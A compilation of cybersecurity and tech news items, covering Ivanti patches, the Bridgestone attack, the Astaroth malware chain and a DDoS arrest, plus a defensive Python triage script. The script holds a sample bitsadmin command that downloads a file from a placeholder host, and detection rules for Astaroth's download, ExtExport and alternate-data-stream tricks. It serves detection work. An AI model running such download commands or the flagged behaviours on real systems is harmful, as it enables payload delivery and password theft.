
Critical Security Flaw Discovered in Ivanti Virtual Traffic Manager


 

Ivanti, a leading company in network and security solutions, has issued urgent security updates to address a critical vulnerability in its Virtual Traffic Manager (vTM). The flaw, identified as CVE-2024-7593, carries an alarming severity with a CVSS score of 9.8 out of 10, signalling its potential risk to users.

Authentication Bypass Could Lead to Rogue Admin Access

The vulnerability arises from an incorrect implementation of the authentication algorithm in Ivanti vTM, excluding specific versions (22.2R1 and 22.7R2). This flaw allows remote attackers to bypass authentication and create unauthorized administrative users. That could give cybercriminals full control over the management interface, posing serious risks to the affected systems.

Affected Versions and Immediate Actions

The vulnerability impacts several versions of Ivanti vTM, including 22.2, 22.3, 22.3R2, 22.5R1, 22.6R1, and 22.7R1. Ivanti has responded by releasing patched versions 22.2R1 and 22.7R2, with fixes for 22.3R3, 22.5R2, and 22.6R2 expected during the week of August 19, 2024. As a temporary measure, the company recommends that users limit admin access to the management interface or restrict it to trusted IP addresses to mitigate the risk of unauthorised access.

Although there are no confirmed incidents of this vulnerability being exploited in the wild, the availability of proof-of-concept (PoC) code increases the urgency for users to apply the latest patches to safeguard their systems.

Additional Vulnerabilities Addressed in Neurons for ITSM

In addition to the vTM flaw, Ivanti has also patched two serious vulnerabilities in its Neurons for ITSM product. The first, CVE-2024-7569, is an information disclosure vulnerability with a CVSS score of 9.6. It affects Ivanti ITSM on-premises and Neurons for ITSM versions 2023.4 and earlier, allowing attackers to obtain sensitive information, including OIDC client secrets, through debug data.

The second flaw, CVE-2024-7570, rated 8.3 on the CVSS scale, involves improper certificate validation. This vulnerability enables a remote attacker in a man-in-the-middle (MITM) position to craft a token that could grant unauthorised access to the ITSM platform as any user. These issues have been resolved in the latest patched versions of 2023.4, 2023.3, and 2023.2.

Further adding to the urgency, Ivanti has also addressed five high-severity vulnerabilities (CVE-2024-38652, CVE-2024-38653, CVE-2024-36136, CVE-2024-37399, and CVE-2024-37373) in its Avalanche product. These flaws could potentially lead to denial-of-service (DoS) conditions or even remote code execution if exploited. Users are strongly advised to update to version 6.4.4, which includes fixes for these issues.

These security updates highlight the critical importance of staying current with patches and updates, especially for systems as vital as traffic management and IT service management platforms. Ivanti's quick response to these vulnerabilities is crucial in helping organisations protect their digital infrastructure from potentially devastating attacks. Users are urged to implement the recommended updates without delay to mitigate any risks posed by these newly discovered flaws.


Dubai Customs Introduces Blockchain Platform to Streamline Commerce

 

Dubai Customs has recently unveiled a new blockchain platform aimed at streamlining commercial activities in the region, reinforcing its status as a technology-forward market. This initiative seeks to address and overcome obstacles hindering entrepreneurship in Dubai by leveraging blockchain technology to enhance transparency and facilitate secure data sharing. 

The newly introduced platform promises to offer secure and cost-effective solutions along with technology-driven logistics initiatives. Sultan Ahmed bin Sulayem, Chairman of Dubai’s Ports, Customs, and Free Zone Corporation, described the platform as a significant advancement in improving business and commercial operations in Dubai. “We are confident that the adoption of modern technologies such as blockchain will greatly contribute to enhancing the business environment and solidifying Dubai’s position as a key global trade hub,” Sulayem stated. 

Blockchain technology, or distributed ledger technology, distributes data across multiple nodes, thus avoiding centralization on a single server as seen in traditional systems. This feature significantly enhances security by making it difficult for malicious actors to infiltrate the network. Additionally, any information stored on blockchain networks is immutable, promoting transparency in business operations. 

Dubai officials are also keen on utilizing other blockchain features such as live tracking of goods and preventing fraud and counterfeiting. This is not the first time Dubai has explored blockchain technology. In May, a plan was revealed to position the region as one of the top ten economies proficient in metaverse technology. In a previous effort, Dubai collaborated with the Solana Foundation to establish a blockchain framework for its free economic zone, the Dubai Multi Commodities Centre (DMCC), in October 2023. This collaboration aimed to assist businesses in expanding their operations by leveraging blockchain technology. 

The new platform by Dubai Customs is expected to revolutionize the way businesses operate in the region, providing a more secure, transparent, and efficient environment for commercial activities. As Dubai continues to integrate cutting-edge technologies, it strengthens its position as a leading global trade hub and a beacon of innovation in the Middle East.

Second Largest Employer Amazon Opts For Robots, Substituting 100,000 Jobs

 

Amazon.com Inc. is swiftly increasing the use of robotics, with over 750,000 robots functioning alongside its employees. 

The second-largest private company in the world employs 1.5 million people. Although that is a large number, it represents a drop of more than 100,000 jobs from the 1.6 million it had in 2021. Meanwhile, the company employed 200,000 robots in 2019 and 520,000 in 2022. Amazon is gradually cutting back on employees while it adds hundreds of thousands of robots annually.

The robots, which include new models such as Sequoia and Digit, are designed to execute repetitive duties and to boost productivity, safety, and delivery speed for Amazon customers. Sequoia, for example, speeds inventory management and order processing at delivery centres, whereas Digit, a bipedal robot developed in collaboration with Agility Robotics, handles tasks such as transporting empty tote boxes.

Amazon's significant investment in robots illustrates the company's commitment to supply chain innovation as well as its belief in the synergistic potential of human-robot collaboration. Despite the vast amount of automation, Amazon stresses that deploying robots has led to the creation of new skilled job categories at the company, mirroring a larger industry trend of integrating innovative technologies with human workforces. 

Amazon's deployment of more than 750,000 robots marks a huge step towards automation at the world's second-largest employer. The move has the potential to drastically alter job dynamics within the organisation and outside. While Amazon claims that robots are designed to collaborate with human employees, assisting them with repetitive chores to increase productivity and workplace safety, concerns about job displacement and the consequences for the workforce are unavoidable. 

The tech giant's integration of robots like Sequoia and Digit into its fulfilment centres is part of a larger drive to enhance supply chain operations using innovative technologies. The robots are intended to streamline processes and provide quicker delivery times to customers. The company emphasises that robotic solutions promote workplace safety and enable it to provide a wider range of products for same-day or next-day delivery. 

The introduction of so many robots into the workplace raises concerns about the future role of human labour in Amazon's operational paradigm. Many people are concerned about the impact on occupations, particularly highly repetitive tasks that could be easily mechanised. Research from universities such as the Massachusetts Institute of Technology (MIT) has found that industrial robots have a major detrimental impact on workers, hurting jobs and salaries in the areas where they are deployed. The broader discussion of automation's economic and political ramifications emphasises common concerns about job displacement and the possibility of higher income inequality. 

Despite these worries, Amazon has noted the emergence of 700 categories of skilled jobs that did not previously exist at the company, implying that automation can also result in the creation of new forms of employment. This change in Amazon's workforce may indicate a shift in the nature of labour, with human employees moving towards more complicated, non-repetitive jobs that demand higher levels of ability and creativity.

Over Fifty Percent Businesses Feel Security Element is Missing in Their Data Policy

 

These days, the average business generates an unprecedented amount of data, and this amount is only expected to increase. 

According to a new report from Rubrik Zero Labs, this makes data security - an absolute must for any successful business - a Herculean task that will only become more difficult. 

The company discovered that a typical organisation's data has grown by nearly half (42%) in the last 18 months. Overall, data from SaaS grew the most (145%), followed by cloud (73%), and on-premises endpoints (20%). A typical organisation has 240 backend terabytes (BETB) of data volume, which Rubrik expects to increase by 100 BETB in the next year and by 7x in the next five years. 

Outpacing security practices

A significant portion of this data is classified. Global organisations have an average of 24.8 million sensitive data records, with 61% storing them in multiple locations (cloud, on-premises, and SaaS). Only 4% have secure data storage facilities. 

Over fifty percent (53%) lost sensitive information in the last year, with 16% experiencing multiple data loss incidents in the previous year. The majority of the time, organisations would lose personally identifiable information (38%), company financial information (37%), and authentication credentials (32%). 

Worryingly, two-thirds of respondents (66%) said their company's data is increasing faster than their ability to control it. Almost every company (98%) has visibility issues, and two-thirds (62%) have difficulty complying with laws and regulations. More than half (54%) have only one senior executive responsible for data security.

According to the report, there is a notable disparity between the perceptions of IT leaders in India and security. Of them, 49% believe that their organization's data policy lacks security, and 30% believe that their organisation faces a significant risk of losing sensitive data in the next 12 months. 

As per the report, 34% of Indian IT leaders believe that their organization's data is at greater risk from malicious hackers, and 54% of them admit that their capacity to handle data security risks has not kept up with the increasing amount of data. 

Rubrik commissioned the study, which was carried out by Wakefield Research among more than 1,600 IT and security decision-makers at firms with 500 or more employees. Half of those polled were CIOs and CISOs, while the other half were Vice Presidents and directors of IT and security. According to the statement, the survey supplemented Rubrik telemetry by examining more than 5,000 clients from 22 industries and 67 countries. 

The report, according to Abhilash Purushothaman, Vice-President & General Manager, Rubrik (Asia), serves as a wake-up call for Indian IT leaders. It highlights the greater risks for private data, particularly in the face of rapidly changing, sophisticated ransomware attacks, he added.

Data: A Thorn in the Flesh for Most Multicloud Deployments

 

Data challenges, such as data integration, data security, data management, and the establishment of single sources of truth, are not new. Combining these problems with multicloud deployments is novel, though. With a little forethought and the application of widespread, long-understood data architecture best practices, many of these issues can be avoided. 

The main issue is when businesses seek to move data to multicloud deployments without carefully considering the typical issues that are likely to occur.

Creating data silos 

It can be challenging to integrate a number of cloud services, which might lead to isolated data silos. Nobody should be surprised, but multicloud has increased the number of data silos in various ways. These need to be addressed with data integration techniques that are already widely known, including data integration technologies, data abstraction/virtualization, or other strategies. Or simply avoid creating silos in your data storage systems.

Ignoring data security 

The complexity of ensuring the protection of sensitive data across many cloud services frequently increases security threats. It is crucial to have a solid data security plan in place that takes into account the particular security requirements of each cloud service without adding to the difficulty of handling data security. This frequently entails employing a central security manager or other technology that is available over the public cloud provider, also known as a supercloud or metacloud, to abstract native security functions. This layer of logical technology, which is located above the clouds, is a concept that is now in flux.  

Not using centralised data management 

If you try to handle everything manually, managing data across many cloud services can be a resource-intensive effort. A centralised system for managing data must be in place, able to handle various data sources and guarantee data consistency. Once more, this needs to be centrally managed and abstracted above native data management implementations and public cloud service providers. Data complexity must be managed according to your terms, not those of the data complexity itself. The latter is what the majority choose, which is a grave error. 

The difficult thing about all of these problems is that they are incredibly solvable thanks to enabling technologies and proven solution patterns. Enterprises commit stupid errors by rushing to multicloud deployments as rapidly as they can, and then they fail to see the ROI from multicloud or cloud migrations in general. Self-inflicted injuries account for the majority of the harm. Make sure you do your homework. Plan. Use the appropriate technologies. It is not difficult, and in the long run, it will save you and your company a tonne of time and money.

Cyber Attack on Bridgestone Leads to Plant Closures Across North America & Latin America

 

After sending workers home for several days, Bridgestone-Firestone tyre manufacturers across North America and Latin America are still fighting to recover from a cyberattack.

Despite numerous attempts for comment, the corporation has remained silent. However, the factory's union, USW 1155L, used Facebook to inform employees that the company was still dealing with the cyberattack and that nobody needed to come in. 

The union wrote on Monday, "Warren hourly teammates who are scheduled to work day shift, March 1st, will not be required to report to work (no-hit, no pay, or you have the option to take a vacation)". 

The outages were originally reported on Sunday when the union posted on Facebook that Bridgestone Americas was investigating a potential source of the information security incident. The notice looked to be sent straight from the firm, rather than from the union. 

The company explained, "Since learning of the potential incident in the early morning hours of February 27, we have launched a comprehensive investigation to quickly gather facts while working to ensure the security of our IT systems. Out of an abundance of caution, we disconnected many of our manufacturing and retreading facilities in Latin America and North America from our network to contain and prevent any potential impact, including those at Warren TBR Plant. First shift operations were shut down, so those employees were sent home." 

"Until we learn more from this investigation, we cannot determine with certainty the scope or nature of any potential incident, but we will continue to work diligently to address any potential issues that may affect our operations, our data, our teammates, and our customers." 

The firm reiterated on Tuesday evening that hourly staff scheduled to work on Wednesday will not be required to report to work. Bridgestone Americas employs nearly 50,000 people in dozens of locations across North America, Central America, and the Caribbean. Outages affecting factories in Iowa, Illinois, North Carolina, South Carolina, Tennessee, and Canada were reported by local news outlets across the United States.

Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


A malware group that goes by the name of ‘Astaroth’ has re-emerged stronger and stealthier than before. This group is known for exploiting Microsoft Windows tools to further its attacks.

Microsoft had become aware of these methods and exposed the malware group and its “living-off-the-land” tactics. But the malware resurfaced with a hike in activity and better techniques.

Reportedly, the Windows Management Instrumentation Command-line (WMIC) was the built-in tool used last time, as spotted by Windows Defender ATP.

Per sources, Microsoft's analysis led to the discovery of a spam operation that spread emails with links to websites hosting a “.LNK” shortcut file, which would instruct WMIC and other Windows tools to run “fileless” malware in memory, well out of the reach of anti-malware.

Sources indicate that, having learnt from its mistakes, Astaroth now entirely dodges the use of WMIC. January and February showed a rise in activity.

According to sources, the new-style campaign still commences with a spam email containing a link to a malicious website hosting an LNK file, but in the new version it employs a file attribute, “Alternate Data Streams” (ADS), that lets the attacker attach data to a file that already exists, so that hiding malicious payloads gets easier.

Per source reports, the spam email that forms the first step of the campaign reads, “Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes”. The link is an archive file marked as “Arquivo_PDF_.zip”.

It abuses ExtExport.exe, which per researchers is a valid process, to load the payload, an extremely unusual attack mechanism.

Once the victim clicks on the LNK file in the .zip archive, the malware runs an obfuscated BAT command line, which drops a JavaScript file into the ‘Pictures’ folder and uses explorer.exe to run the file.

Researchers mention, and sources confirm, that using ADS lets the stream data stay invisible in File Explorer. In this version, Astaroth reads and decrypts plugins from ADS streams in desktop.ini that let it steal email and browser passwords. It also disables security software.

Per sources, the plugins are the “NirSoft WebBrowserPassView” tool, for recovering browser passwords, and the “NirSoft MailPassView” tool, for recovering email client passwords.

This is not the only legitimate tool Astaroth exploits. A command-line tool that goes by the name of “BITSAdmin”, which helps admins create download and upload jobs and track their progress, is exploited to download encrypted payloads.

Reportedly, Astaroth has previously wreaked havoc on continents like Asia, North America, and Europe.
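For defenders, the behaviours described above (BITSAdmin downloads, ExtExport.exe execution, ADS access on desktop.ini, a script run from the Pictures folder) can be turned into a simple triage pass over process-creation logs. The following is an added example, not code from the original post or from Microsoft; the event records are constructed, the rule names are hypothetical, and flagging every ExtExport.exe run assumes the binary is rarely used legitimately in your environment.

```python
import ntpath
import re

# Constructed process-creation records (not real telemetry); paths, job names
# and the example.invalid URL are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download http://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "cmdline": r"ExtExport.exe C:\Users\Public\Libraries\x foo bar"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c more < C:\Users\Public\desktop.ini:constructed_stream"},
    {"image": r"C:\Windows\explorer.exe",
     "cmdline": r"explorer.exe C:\Users\alice\Pictures\update.js"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\desktop.ini"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},
]


def _image_is(event, name):
    # ntpath parses Windows paths regardless of the OS running the analysis.
    return ntpath.basename(event["image"]).lower() == name


# Hypothetical rule names, one per behaviour the article describes.
RULES = {
    # BITSAdmin creating a transfer job, as opposed to listing or monitoring.
    "bitsadmin_transfer": lambda e: _image_is(e, "bitsadmin.exe")
    and bool(re.search(r"/(transfer|addfile)\b", e["cmdline"], re.I)),
    # Any ExtExport.exe execution (assumption: rare in normal use).
    "extexport_exec": lambda e: _image_is(e, "extexport.exe"),
    # "desktop.ini:<name>" is alternate-data-stream syntax; a plain
    # "desktop.ini" path with no stream suffix does not match.
    "desktop_ini_ads": lambda e: bool(
        re.search(r"desktop\.ini:[^\\/\s:]+", e["cmdline"], re.I)),
    # A .js file launched from a Pictures folder.
    "script_from_pictures": lambda e: bool(
        re.search(r"\\Pictures\\[^\\\s]+\.js\b", e["cmdline"], re.I)),
}


def triage(events):
    """Return {event index: [matched rule names]} for events worth a look."""
    hits = {}
    for i, event in enumerate(events):
        matched = [name for name, rule in RULES.items() if rule(event)]
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], names)
```

Each rule alone is noisy; correlating several of them on one host within a short window is what makes the chain stand out.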

Teenager Arrested for DDoS Attack in Ukraine


Ukrainian Police arrested a 16-year-old teenager last month on charges of attacking a local Internet Service Provider (ISP) to gain personal information about its users. The Ukrainian police say that the teen used DDoS (distributed denial of service) attacks to take down the local ISP. This happened after the local ISP refused to give the teenager the details of a user. The severity of the attack made the ISP contact law enforcement last year to resolve the issue.


"The officers at Ukraine Cyber Police hunted down the 16-year-old attacker in the city of Odesa in January," said the spokesperson for the Ministry of Internal Affairs in a conversation with ZDNet. "We explored the teen's home and confiscated all the devices. Upon investigation, the teen was found guilty of the attack. According to the authorities that conducted the preceding inspection of the defendant's system, the authorities found software that the teen used to launch the DDoS attacks. Besides this, details of 20 different accounts related to distinct hacker forums were also found," said the Cyber Police of Ukraine in a statement.

As per the Criminal Law of Ukraine, a person found guilty of a DDoS attack faces imprisonment for up to 5 years. However, the teen is not charged with attempted extortion of the ISP. The Ukrainian Police has declined to release any further information regarding the case. It has also not disclosed the person affected by the DDoS attack, saying, "the investigation is still in process." It is not the first incident where a DDoS attack was performed to steal user information.

In several other cases, the hackers were able to take down the ISP network using a simple technique like a DDoS botnet. Other instances similar to this case appeared in countries like Cambodia, Liberia, and various other countries in South Africa. As per the observations, to perform attacks with massive volumes of junk traffic, the hackers use a DDoS botnet, which is very capable. This happened in Liberia. Carpet bombing is another efficient technique to perform such attacks (as per the incidents that happened in South Africa).